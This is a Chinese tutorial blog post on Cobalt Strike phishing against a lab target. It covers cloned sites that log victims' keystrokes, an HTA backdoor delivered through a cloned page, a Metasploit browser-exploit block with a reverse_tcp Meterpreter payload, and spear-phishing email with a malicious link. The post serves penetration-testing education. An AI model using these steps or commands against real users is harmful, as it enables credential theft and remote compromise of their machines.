154.网络安全渗透测试—[Cobalt Strike系列]—[钓鱼攻击/鱼叉钓鱼]

我认为,无论是学习安全还是从事安全的人多多少少都有些许的情怀和使命感!!!

文章目录

    • 一、钓鱼攻击和鱼叉钓鱼简介
      • 1、钓鱼攻击简介
      • 2、钓鱼攻击模块:6个
      • 3、鱼叉钓鱼简介
      • 4、鱼叉钓鱼示例:邮件钓鱼
    • 二、钓鱼攻击测试
      • 1、测试环境
      • 2、System Profiler(信息搜集)
      • 3、Clone Site(克隆网站):获取键盘记录
      • 4、生成hta后门文件+文件下载(cs上传hta)+Clone Site(克隆网站):钓鱼攻击获取cs会话
      • 5、MSF溢出代码+CS克隆网站:钓鱼攻击获取MSF会话
    • 三、鱼叉钓鱼测试
      • 1、邮件钓鱼

一、钓鱼攻击和鱼叉钓鱼简介

1、钓鱼攻击简介

    网络钓鱼是指诱导人们连接那些黑客已经锁定的目标。这种攻击方法的成功率很高,也非常常见。点击链接、打开表格或者连接其他一些文件都会感染病毒。一次简单的点击相当于为攻击者开启了一扇电子门,这样他就可以接触到你的内部弱点了。因为你已经同意他进入,他能够接触弱点,然后挖掘信息和授权连接。

2、钓鱼攻击模块:6个

(1)Manage(web服务管理): 对开启的web服务进行管理;

(2)Clone Site(克隆网站) : 可以记录受害者提交的数据;

(3)Host File(文件下载):提供一个本地文件下载;

(4)Scripted Web Delivery(脚本web传递): 基于Web的攻击测试脚本,自动生成可执行的payload ,通常用这个模块来生成powershell命令反弹shell;

(5)Signed Applet Attack(签名Applet攻击):启动一个Web服务以提供自签名Java Applet的运行环境;

(6)Smart Applet Attack(智能攻击) 自动检测Java版本并利用已知的exploits绕过security;

(7)System Profiler(信息搜集):用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。

//如下图所示:
在这里插入图片描述

3、鱼叉钓鱼简介

(1)鱼叉式网络钓鱼(Spear phishing)指一种源于亚洲与东欧只针对特定目标进行攻击的网络钓鱼攻击。

(2)由于鱼叉式网络钓鱼锁定之对象并非一般个人,而是特定公司、组织之成员,故受窃之资讯已非一般网络钓鱼所窃取之个人资料,而是其他高度敏感性资料,如知识产权及商业机密。

4、鱼叉钓鱼示例:邮件钓鱼

//如下图所示:点击攻击下的邮件钓鱼进行鱼叉式钓鱼
在这里插入图片描述
在这里插入图片描述

二、钓鱼攻击测试

1、测试环境

在这里插入图片描述

2、System Profiler(信息搜集)

(1)CS生成信息收集的钓鱼链接:点击攻击-->点击钓鱼攻击-->点击信息收集-->填写钓鱼的URL-->填写team server地址-->填写web端口-->填写重定向的地址(该重定向只是为了让受害者以为真的只是访问百度)
//如下图所示:调出信息收集模块
在这里插入图片描述
//如下图所示:在team server服务器上开启了一个80服务,该服务的地址是http://cs.clqwsn.xyz/baidu,该地址是钓鱼链接可以反弹系统信息给cs,还会自动的重定向到百度
在这里插入图片描述
//如下图所示:生成钓鱼链接http://cs.clqwsn.xyz:80/baidu在这里插入图片描述

(2)cs上查看是否真的生成了钓鱼链接的服务:点击攻击-->点击钓鱼攻击-->点击web服务管理即可看到刚刚生成的服务
//如下图所示:
在这里插入图片描述

(3)当靶机访问http://cs.clqwsn.xyz:80/baidu该链接,cs就会收集到靶机信息,而且靶机也会很快的跳到百度,一般很难被发现。
//如下图所示:靶机访问钓鱼链接后,紧接着发送信息给了cs,然后自己重定向到了百度
在这里插入图片描述

(4)cs上查看靶机的信息:点击视图-->点击应用信息-->查看收集到的靶机信息
//如下图所示:
在这里插入图片描述

3、Clone Site(克隆网站):获取键盘记录

(1)CS生成克隆网站的钓鱼链接:点击攻击-->点击钓鱼攻击-->点击克隆网站-->填写要克隆的网站-->填写本地team server的URI-->填写本地team server的地址-->选择80端口-->勾选开启键盘记录
//如下图所示:
在这里插入图片描述

//如下图所示:在team server上开启了一个80服务,该地址是http://cs.clqwsn.xyz/mail,该地址的网站是根据mail.tom.com克隆而来的,受害者点击访问该80的地址的时候可以记录受害者的键盘记录
在这里插入图片描述

//如下图所示:生成钓鱼链接http://cs.clqwsn.xyz:80/mail
在这里插入图片描述

(2)cs上检查是否开启了80服务
//如下图所示:成功开启了克隆网站
在这里插入图片描述

(3)靶机浏览器访问钓鱼链接,并填写账号信息
在这里插入图片描述

(4)CS上查看靶机的键盘记录:点击视图-->点击web日志-->查看到键盘记录
在这里插入图片描述

4、生成hta后门文件+文件下载(cs上传hta)+Clone Site(克隆网站):钓鱼攻击获取cs会话

(1)首先我们要生成一个hta后门文件到本地:新建监听器-->创建hta后门
//如下图所示:9527监听器
在这里插入图片描述
//如下图所示:hta后门绑定9527监听器
在这里插入图片描述

(2)其次我们要把这个hta后门文件通过文件下载模块,上传到靶机的80服务上:点击攻击-->点击钓鱼攻击-->点击文件下载-->上传hta后门文件
//如下图所示:调出文件下载模块
在这里插入图片描述

//如下图所示:把本地的hta后门上传到team server的80服务的update.hta
在这里插入图片描述
(3)cs上检查是否开启了80服务
在这里插入图片描述

(4)克隆网站的时候,Attack填写为hta的下载地址,然后靶机访问钓鱼链接的时候不仅仅只是访问了一个克隆网站的样子,还会下载到该hta后门(这个文件下载,是对受害者来说的;如果对cs来说其实是上传文件到自己的web服务器上,然后在供给受害者下载。)

在这里插入图片描述
在这里插入图片描述
(5)靶机访问钓鱼链接:不仅会显示克隆的网站,还会提示下载hta后门,只要运行了下载的后门文件,就会反弹会话到cs
//如下图所示:
在这里插入图片描述
(6)cs上查看上线的靶机:
在这里插入图片描述

5、MSF溢出代码+CS克隆网站:钓鱼攻击获取MSF会话

(1)MSF生成反弹会话的链接:http://47.x.x.x:9999/21HPgNXV7Ub6zz

use exploit/windows/browser/ms14_064_ole_code_execution
set srvhost [msf恶意链接的ip]
set SRVPORT [msf恶意链接的端口]
set payload windows/meterpreter/reverse_tcp
set lhost [msf的ip]
Set lport [msf监听的端口]
exploit

在这里插入图片描述

(2)CS克隆网站的时候,其中的Attack填写MSF的链接,此时生成的钓鱼链接http://cs.clqwsn.xyz:80/2不仅仅是克隆的百度网站的样子,还可以反弹会话给MSF
在这里插入图片描述
在这里插入图片描述

(3)当受害人访问http://cs.clqwsn.xyz/2的时候, 就会加载http://47.x.x.x:9999/21HPgNXV7Ub6zz进行溢出攻击,从而反弹会话给MSF
//由于,该溢出攻击对靶机无效,所以图略

三、鱼叉钓鱼测试

1、邮件钓鱼

(1)自己的163邮箱开启POP3/SMTP代发功能:这个授权码是代理邮箱登录时候的密码
在这里插入图片描述

(2)设置目标qq邮箱:目标邮箱和名称之间必须是一个Tab键,虽然四个空格也可以解析,但是会报错
在这里插入图片描述

(3)从gmail谷歌邮箱收集邮件模板:点击显示原始邮件,另存为本地template.txt
在这里插入图片描述

在这里插入图片描述

(4)CS进入邮件钓鱼模块:点击攻击-->邮件钓鱼
在这里插入图片描述

(5)分析邮件钓鱼的各个模块
在这里插入图片描述

Targets:存有目标邮箱及收件人信息的文本文件
Template:邮件模板文件
Attachment:附件(这里没有用到)
Embed URL:填写url钓鱼链接, 可将邮件的内置链接替换掉。此处我填写了带有hta木马下载功能的克隆网站,也就是第三个实验中的钓鱼链接http://cs/clqwsn.xyz/1
Mail Server: 邮箱服务器相关信息,该服务器信息是代发邮件的服务器,这里使用的是163的邮箱
Bounce to:邮箱地址

(6)发送钓鱼邮件:这里我们让163邮箱代发邮件给qq邮箱,其中内嵌了第三个实验的钓鱼链接http://cs.clqwsn.xyz/r1,这个链接不仅可以看到克隆的百度网站,同时还会下载hta后门
//如下图所示:具体的配置
在这里插入图片描述
//如下图所示:上面图中设置代发邮件的163邮箱
在这里插入图片描述

(7)在点击发送之后,会显示如下视图,则163邮箱(代理邮箱服务器)会自动的给qq邮箱(受害者)发送一个内嵌了恶意链接的邮件
在这里插入图片描述

(8)登录受害者邮件,发现收到了新的邮件
在这里插入图片描述

(9)受害者打开邮件,并点击恶意链接,则会跳转http://cs.clqwsn.xyz/r1下载hta后门
在这里插入图片描述
在这里插入图片描述

(10)假如受害者执行了后门文件,cs会上线受害者主机
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/30987.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

个人年终述职报告PPT怎么做?

适用于职场工作汇报、述职报告、岗位竞聘的PPT模板 这套微粒体风格的述职报告PPT模板采用了立体的几何图形设计,以白色、橙色、深蓝色为主,整体设计简约大气高端。其中还结合了时间轴、流程图、脑图等PPT素材,可以更直观展现工作述职报告的内…

计算机机房防雷接地标准,机房防雷接地规范与防雷接地方式,你知道吗?

雷电的描述 雷电是由天空中云层间的相互高速运动、剧烈磨擦,使高端云层和低端云层带上相反电荷。此时,低端云层在其下面的大地上也感应出大量的异种电荷,形成一个极大的电容,当其场强达到一定强度时,就会产生对地放电&…

地凯模块化机房防雷接地防雷工程设计方案

智能微模块的防雷接地系统由防雷方案和接地方案组成。 防雷方案:智能微模块主要有以下防雷工程方案。 SPD(surge protection device)浪涌保护器的安装符合以下要求:SPD 安装在被保护设备 的前端,SPD 的连接导线应尽可…

防雷工程中防雷等级的意义

在现代社会中,各种电子设备和通信系统已经成为我们生活中不可或缺的一部分。然而,雷击是这些设备和系统的一个常见问题,不仅会导致设备损坏,还可能对人们的生命财产造成威胁。因此,防雷措施变得尤为重要。 为了保护设…

防雷接地的施工工艺与防雷施工方案

雷电是自然界的一种强大而危险的自然现象,经常造成重大财产损失和人员伤亡。为了保护建筑物和人员免受雷电的危害,防雷接地系统的设计和施工至关重要。本文将介绍防雷接地的施工工艺和防雷施工方案,强调专业和符合国家标准的方法,…

防雷知识:什么是雷电浪涌

浪涌是突然发生并超过典型工作电压的过电压。一般来说,浪涌是电路中短暂的电流、电压或功率波。今天我们就来科普一下什么是雷电浪涌。 什么是浪涌? 浪涌,顾名思义,是一种突然发生并超过典型工作电压的过电压。一般来说&#xf…

单位、家庭建筑物电气、电子设备防雷举措

前 言 在现实的学习、工作、生活中,有时会面对自然灾害、重特大事故、环境公害及人为破坏等突发事件,为了控制事故的发展,就不得不需要事先制定应急预案。那要怎么制定科学的应急预案呢﹖下面是小编为大家整理的单位、住宅建筑物、电子电气防…

科学防雷接地和雷电防护方案

说到防雷,可能不少人首先会想到避雷针,而“避雷针”这一概念,很容易让大家对防雷的概念造成误解。 误解1: 避雷针是用来“避雷”的。 其实,避雷针的学名叫“接闪器”,不是用来“避开雷击”的,而是用来“迎…

通信基站防雷接地方案

由于各基站的环境和建设方式不同,所以对基站防雷接地不能一概而论,应根据具体情况采取防雷与接地措施, 因地制宜实施防雷接地工程,将基站接地系统按照均压等电位的原理进行设计和改造,即通信设备的工作地、保护地、防雷…

智能云防雷,信号浪涌保护器防雷接地方案

1 现代防雷的重点是信息化设备 信息技术设备是集计算机技术和微电子技术于一身的高科技技术产品,由大规模芯片电路组成,信号电压低,抗雷击电磁脉冲(LEMP)的能力很差,在闪电强磁场环境下的易损性较高。雷电已成为信息技术应用中的一…

做好防雷检测的重要意义和作用

防雷检测是一项非常重要的工作,它可以保障人们的生命财产安全,并维护国家的安全稳定。地凯科技将从防雷的重要性、防雷检测的行业应用和防雷行业国标三个方面来阐述防雷检测的重要性。 一、防雷的重要性 随着科技的不断发展,人们的生活和工作…

同为(TOWE)远程智能防雷预警监测——交直流遥信防雷配电柜

当前,社会各领域中各类先进的电子仪器广泛分布于每一个角落,由于高精尖电子设备的高度集成化,其耐压水平普遍较低,导致雷电流、浪涌侵入设备的风险越来越高,故需要在重要设备前端加装浪涌保护器(SPD&#x…

教你学会塔罗免费占卜十八招

教你学会塔罗免费占卜十八招 塔罗牌占卜抽到不好的命运怎么办?#塔罗牌#塔罗牌占卜 hello,大家好,这是我的第一期文章。今天主要讲一讲在塔罗牌占卜中,有的时候我们会抽到不好的命运,不好的牌艺,我们该如何…

全新算命付费测算网站源码 星座运势塔罗牌牛年运程宝宝起名姻缘等

介绍: PHP开发的 网盘下载地址: http://kekewangLuo.net/BFhpbGNNy1P 图片:

最新修复PHP塔罗牌风水占卜源码 对接支付

介绍: 测试环境:Nginx 1.18.0-MySQL 5.6.49-PHP-5.6 大家跟着这个环境配置就行 1.创建站点,上传源码至根目录,解压 2.创建数据库,填入数据库配置信息,上传,导入 数据库 3.修改数据库连接信息 …

2023最新测算系统源码/有风水起名/算姻缘/易经周易/占卜开运等等

正文: 支持微信/支付宝H5和电脑端扫码支付、手机端可以调起微信/支付宝应用支付 支持后台设置价格、后台设置支付接口信息 支持各种手机浏览器、微信公众绑定、微信内,等各种设置的使用和调起支付能力 支持分销代理功能,可设下线、用户自主注册、也可…

新版付费测算源码 星座运势 塔罗牌 牛年运程 宝宝起名 月老姻缘 起名算命程序第三版支持易支付

新版付费测算源码 星座运势 塔罗牌 牛年运程 宝宝起名 月老姻缘 起名算命程序第三版支持对接易支付,这是一款很不错的测算源码小白已经测试过了是能正常运营的,首页有三套模板原版的有点BUG我已经修复好了搭建的教程我也写在源码里面的,感兴趣…

塔罗牌微信小程序源码

记录一下开发塔罗牌微信小程序整个过程: 1.塔罗牌运势模块: 整个此模块包含4个主页面: 首页 选牌页面 订单页面 详情页面 a:首页 整个首页相对来说还是比较简单的,样式实现就不说了比较简单,首页主要有一个滚动事件,就是滚动页面时,如果滚动条位置超开始按钮的高度时,自动显示底…

塔罗牌php 源代码,最终完善版PHP塔罗牌风水占卜源码 对接支付

屏聚源码分享最终完善版 PHP塔罗牌风水占卜源码 星座爱情事业情感算命财运未来运势大解密 20200114 更新: 之前有发布过,这个是对接了支付的,也就是相对来说完美运营了,和之前的对比就是新增了支付。 2019 更新: 塔罗占…

2022年「博客之星」参赛博主:一个处女座的测试

我正在参加年度博客之星评选,请大家帮我投票打分,您的每一分都是对我的支持与鼓励。 五星必回,诚信互评,(如果)今日已满,明天必回,言出必行,感谢支持! 我正在…